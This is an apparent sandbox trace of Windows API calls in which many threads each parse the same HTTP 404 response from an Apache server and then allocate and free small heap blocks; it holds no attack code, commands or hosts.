[0180.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.530] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.530] GetProcessHeap () returned 0x6a0000 [0180.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0180.530] GetProcessHeap () returned 0x6a0000 [0180.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0180.530] GetProcessHeap () returned 0x6a0000 [0180.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 109 os_tid = 0x1058 [0180.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.747] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.747] GetProcessHeap () returned 0x6a0000 [0180.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0180.747] GetProcessHeap () returned 0x6a0000 [0180.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0180.750] GetProcessHeap () returned 0x6a0000 [0180.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 110 os_tid = 0x105c [0181.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.015] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.015] GetProcessHeap () returned 0x6a0000 [0181.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0181.015] GetProcessHeap () returned 0x6a0000 [0181.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0181.015] GetProcessHeap () returned 0x6a0000 [0181.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 111 os_tid = 0x1068 [0181.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.397] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.397] GetProcessHeap () returned 0x6a0000 [0181.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0181.398] GetProcessHeap () returned 0x6a0000 [0181.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0181.398] GetProcessHeap () returned 0x6a0000 [0181.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 112 os_tid = 0x107c [0181.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.755] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.755] GetProcessHeap () returned 0x6a0000 [0181.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0181.755] GetProcessHeap () returned 0x6a0000 [0181.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0181.755] GetProcessHeap () returned 0x6a0000 [0181.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 113 os_tid = 0x1084 [0181.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.985] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:28 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.985] GetProcessHeap () returned 0x6a0000 [0181.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0181.985] GetProcessHeap () returned 0x6a0000 [0181.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0181.985] GetProcessHeap () returned 0x6a0000 [0181.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 114 os_tid = 0x1098 [0182.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.186] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.186] GetProcessHeap () returned 0x6a0000 [0182.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0182.186] GetProcessHeap () returned 0x6a0000 [0182.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0182.186] GetProcessHeap () returned 0x6a0000 [0182.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 115 os_tid = 0x109c [0182.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.387] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.387] GetProcessHeap () returned 0x6a0000 [0182.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0182.387] GetProcessHeap () returned 0x6a0000 [0182.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0182.387] GetProcessHeap () returned 0x6a0000 [0182.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 116 os_tid = 0x10a8 [0182.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.634] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.634] GetProcessHeap () returned 0x6a0000 [0182.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0182.635] GetProcessHeap () returned 0x6a0000 [0182.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0182.635] GetProcessHeap () returned 0x6a0000 [0182.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 117 os_tid = 0x10ac [0182.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0182.885] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:29 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.885] GetProcessHeap () returned 0x6a0000 [0182.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0182.885] GetProcessHeap () returned 0x6a0000 [0182.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0182.885] GetProcessHeap () returned 0x6a0000 [0182.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 118 os_tid = 0x10d8 [0183.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.055] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.055] GetProcessHeap () returned 0x6a0000 [0183.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0183.055] GetProcessHeap () returned 0x6a0000 [0183.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0183.055] GetProcessHeap () returned 0x6a0000 [0183.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 119 os_tid = 0x10dc [0183.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.280] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.280] GetProcessHeap () returned 0x6a0000 [0183.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0183.280] GetProcessHeap () returned 0x6a0000 [0183.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0183.280] GetProcessHeap () returned 0x6a0000 [0183.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 120 os_tid = 0x10e0 [0183.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.508] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.508] GetProcessHeap () returned 0x6a0000 [0183.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0183.509] GetProcessHeap () returned 0x6a0000 [0183.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0183.509] GetProcessHeap () returned 0x6a0000 [0183.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 121 os_tid = 0x10e4 [0183.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.741] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.741] GetProcessHeap () returned 0x6a0000 [0183.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0183.741] GetProcessHeap () returned 0x6a0000 [0183.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0183.741] GetProcessHeap () returned 0x6a0000 [0183.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 122 os_tid = 0x604 [0183.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.974] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:30 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.974] GetProcessHeap () returned 0x6a0000 [0183.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0183.974] GetProcessHeap () returned 0x6a0000 [0183.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0183.974] GetProcessHeap () returned 0x6a0000 [0183.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 123 os_tid = 0x10fc [0184.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.184] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.184] GetProcessHeap () returned 0x6a0000 [0184.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0184.184] GetProcessHeap () returned 0x6a0000 [0184.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0184.185] GetProcessHeap () returned 0x6a0000 [0184.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 124 os_tid = 0x1100 [0184.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.368] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.368] GetProcessHeap () returned 0x6a0000 [0184.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0184.368] GetProcessHeap () returned 0x6a0000 [0184.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0184.368] GetProcessHeap () returned 0x6a0000 [0184.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 125 os_tid = 0x1114 [0184.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.574] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.574] GetProcessHeap () returned 0x6a0000 [0184.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0184.574] GetProcessHeap () returned 0x6a0000 [0184.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0184.575] GetProcessHeap () returned 0x6a0000 [0184.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 126 os_tid = 0x1118 [0184.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.809] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:31 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.809] GetProcessHeap () returned 0x6a0000 [0184.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0184.809] GetProcessHeap () returned 0x6a0000 [0184.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0184.809] GetProcessHeap () returned 0x6a0000 [0184.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 127 os_tid = 0x112c [0185.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.030] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.030] GetProcessHeap () returned 0x6a0000 [0185.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0185.030] GetProcessHeap () returned 0x6a0000 [0185.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0185.030] GetProcessHeap () returned 0x6a0000 [0185.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 128 os_tid = 0x1130 [0185.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.232] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.232] GetProcessHeap () returned 0x6a0000 [0185.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0185.232] GetProcessHeap () returned 0x6a0000 [0185.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0185.232] GetProcessHeap () returned 0x6a0000 [0185.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 129 os_tid = 0x1144 [0185.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.433] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.433] GetProcessHeap () returned 0x6a0000 [0185.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0185.433] GetProcessHeap () returned 0x6a0000 [0185.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0185.433] GetProcessHeap () returned 0x6a0000 [0185.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 130 os_tid = 0x1148 [0185.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.644] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.644] GetProcessHeap () returned 0x6a0000 [0185.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0185.644] GetProcessHeap () returned 0x6a0000 [0185.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0185.644] GetProcessHeap () returned 0x6a0000 [0185.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 131 os_tid = 0x1154 [0185.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.964] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:32 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.964] GetProcessHeap () returned 0x6a0000 [0185.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0185.964] GetProcessHeap () returned 0x6a0000 [0185.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0185.964] GetProcessHeap () returned 0x6a0000 [0185.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 132 os_tid = 0x1158 [0186.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.221] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.221] GetProcessHeap () returned 0x6a0000 [0186.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0186.221] GetProcessHeap () returned 0x6a0000 [0186.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0186.221] GetProcessHeap () returned 0x6a0000 [0186.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 133 os_tid = 0x1174 [0186.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.426] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.426] GetProcessHeap () returned 0x6a0000 [0186.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0186.426] GetProcessHeap () returned 0x6a0000 [0186.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0186.426] GetProcessHeap () returned 0x6a0000 [0186.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 134 os_tid = 0x1178 [0186.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.873] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:33 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.873] GetProcessHeap () returned 0x6a0000 [0186.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0186.873] GetProcessHeap () returned 0x6a0000 [0186.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0186.873] GetProcessHeap () returned 0x6a0000 [0186.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 135 os_tid = 0x864 [0187.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.191] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.191] GetProcessHeap () returned 0x6a0000 [0187.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0187.191] GetProcessHeap () returned 0x6a0000 [0187.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0187.191] GetProcessHeap () returned 0x6a0000 [0187.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 136 os_tid = 0x132c [0187.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.384] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.384] GetProcessHeap () returned 0x6a0000 [0187.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0187.384] GetProcessHeap () returned 0x6a0000 [0187.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0187.384] GetProcessHeap () returned 0x6a0000 [0187.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 137 os_tid = 0x117c [0187.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.596] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:34 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.596] GetProcessHeap () returned 0x6a0000 [0187.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0187.596] GetProcessHeap () returned 0x6a0000 [0187.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0187.596] GetProcessHeap () returned 0x6a0000 [0187.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 138 os_tid = 0x1190 [0187.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.789] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:34 GMT\r\nServer: 